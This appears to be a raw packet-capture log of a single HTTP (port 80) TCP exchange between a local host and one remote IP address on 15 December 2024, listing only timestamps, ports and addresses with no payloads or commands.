                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.712794065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.712995052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.716738939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.716967106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.717106104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.720386982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.720490932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.720602036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.723932028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.724045038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.724165916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.727530003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.727674007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.727968931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.730967045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.731098890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.731297016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.734369040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.734487057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.734793901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.738228083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.738328934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.738903999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.741379976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.741436005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.741559982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.744677067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.744811058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.745060921 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.748157978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.748383045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.748553038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.752620935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.752891064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.753070116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.756014109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.756128073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.756344080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.759093046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.759232998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.759468079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.762012005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.762135029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.762542009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.765336037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.765577078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.765682936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.768901110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.769026995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.769135952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.772222996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.772279024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.772392035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.775583982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.775733948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.776057005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.779006004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.779156923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.779336929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.782453060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.782584906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.782902956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.785895109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.786000967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.786199093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.789311886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.789436102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.789609909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.792795897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.792957067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.793071985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.797027111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.797080994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.797211885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.800139904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.800266027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.800374031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.803073883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.803179979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.803322077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.807180882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.852726936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.903248072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.903423071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.903769970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.904614925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.904731035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.904999971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.907645941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.907742977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.907951117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.910578966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.910662889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.910806894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.913417101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.913517952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.913672924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.916250944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.916366100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.916466951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.919059038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.919172049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.919275045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.921765089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.921857119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.921961069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.924485922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.924568892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.924751997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.927218914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.927308083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.927551985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.929816961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.929923058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.930092096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.932324886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.932427883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.932615995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.934886932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.935003042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.935245991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.937427998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.937544107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.937659979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.940053940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.940104961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.940310001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.942586899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.942715883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.942822933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.945079088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.945230961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.945568085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.947660923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.947865963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.948549986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.950212955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.950324059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.950473070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.952755928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.952873945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.953439951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.955311060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.955416918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.955811977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.957875967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.957981110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.958085060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.960429907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.960551977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.960767031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.962975979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.963155985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.963320971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.965836048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.965852022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.966300964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.968192101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.968323946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.968537092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.970978975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.971084118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.971204996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.973197937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.973306894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.973462105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.975733995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.975846052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.975954056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.978404045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.978548050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.978650093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.981102943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.981219053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.981477022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.983433008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.983541965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.983661890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.986047029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.986088037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.986323118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.988544941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.988653898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.988910913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.991153002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.991307020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.991455078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.993676901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.993834972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.994154930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.996321917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.996386051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.996648073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.998807907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.998928070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:39.999108076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.001334906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.001449108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.001697063 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.003885031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.003988028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.004095078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.007096052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.007267952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.007683039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.009576082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.009641886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.009818077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.011900902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.012010098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.012159109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.014103889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.014216900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.016568899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.016666889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.016774893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.017016888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.019244909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.019340992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.019717932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.021800995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.021984100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.022092104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.024315119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.024435043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.025477886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.026942015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.027169943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.027328968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.029498100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.029644966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.032104969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.032751083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.095443964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.095679998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.096522093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.096792936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.096864939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.097033024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.098731995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.098805904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.098931074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.099334002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.100922108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.101049900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.101676941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.103033066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.103169918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.103334904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.104964018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.105076075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.105314970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.106980085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.107067108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.107287884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.108942032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.109036922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.109252930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.110913992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.111026049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.111265898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.112793922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.112880945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.113554955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.114665985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.114758015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.114909887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.116945982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.117059946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.117187023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.118658066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.118859053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.118915081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.120450020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.120548010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.120563030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:40.122225046 CET8049709185.81.68.147192.168.2.8
